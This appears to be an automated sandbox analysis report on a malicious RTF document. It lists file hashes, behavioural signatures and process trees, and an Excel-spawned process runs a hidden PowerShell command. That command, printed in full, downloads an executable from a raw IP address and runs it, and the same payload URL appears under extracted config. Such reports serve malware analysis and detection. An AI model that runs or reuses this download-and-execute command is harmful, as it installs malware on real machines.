Analysis
- max time kernel: 143s
- max time network: 148s
- platform: windows7_x64
- resource: win7
- submitted: 30-06-2020 04:40

Static task: static1
Behavioral task: behavioral1
  Sample: SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
  Resource: win7
Behavioral task: behavioral2
  Sample: SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
  Resource: win10v200430
General
- Target: SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
- Size: 97KB
- MD5: 340e15c9ee5ae17758bb2e4a7890c0c0
- SHA1: 7bd2df48ad16fe08db23700ab57e781048f9bc76
- SHA256: 894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17
- SHA512: b93846e9dffea0449e4a1f441aa4956da9220c41d2564838e0ac95c4a0a6878dfdf0163087a42834e2edd59751c9097e3bd0834d06405060db3a1ab68a33ada6
Malware Config
- Extracted: http://185.208.211.67/scorp/Class.sfx.exe
Signatures
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid 740  WINWORD.EXE
- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes:
    pid 740   WINWORD.EXE
    pid 740   WINWORD.EXE
    pid 1048  EXCEL.EXE
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    Token: SeDebugPrivilege  pid 1800  powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid 1800  powershell.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
    pid 740  WINWORD.EXE
    pid 740  WINWORD.EXE
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process
    pid 1800 powershell.exe, spawned by target pid 1048 EXCEL.EXE
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    PID 1048 wrote to memory of 1800  EXCEL.EXE -> powershell.exe
    PID 1048 wrote to memory of 1800  EXCEL.EXE -> powershell.exe
    PID 1048 wrote to memory of 1800  EXCEL.EXE -> powershell.exe
- Blacklisted process makes network request (1 IoC)
  Processes:
    flow 4  pid 1800  powershell.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
    pid 1800  powershell.exe
- Office loads VBA resources, possible macro or embedded object present
Processes
- C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf"
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of FindShellTrayWindow
- C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of EXCEL.EXE)
    Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/scorp/Class.sfx.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Process spawned unexpected child process
    - Blacklisted process makes network request
    - Suspicious behavior: GetForegroundWindowSpam
- C:\Program Files\Microsoft Office\Office14\excelcnv.exe
  Command line: "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding
Downloads
- memory/740-5-0x00000000024D0000-0x00000000024D4000-memory.dmp (Filesize 16KB)
- memory/740-6-0x0000000007030000-0x0000000007034000-memory.dmp (Filesize 16KB)
- memory/1048-1-0x0000000005AD0000-0x0000000005BD0000-memory.dmp (Filesize 1024KB)
- memory/1048-0-0x0000000005AD0000-0x0000000005BD0000-memory.dmp (Filesize 1024KB)
- memory/1048-3-0x0000000007670000-0x0000000007674000-memory.dmp (Filesize 16KB)
- memory/1048-4-0x0000000006670000-0x0000000006674000-memory.dmp (Filesize 16KB)
- memory/1800-2-0x0000000000000000-mapping.dmp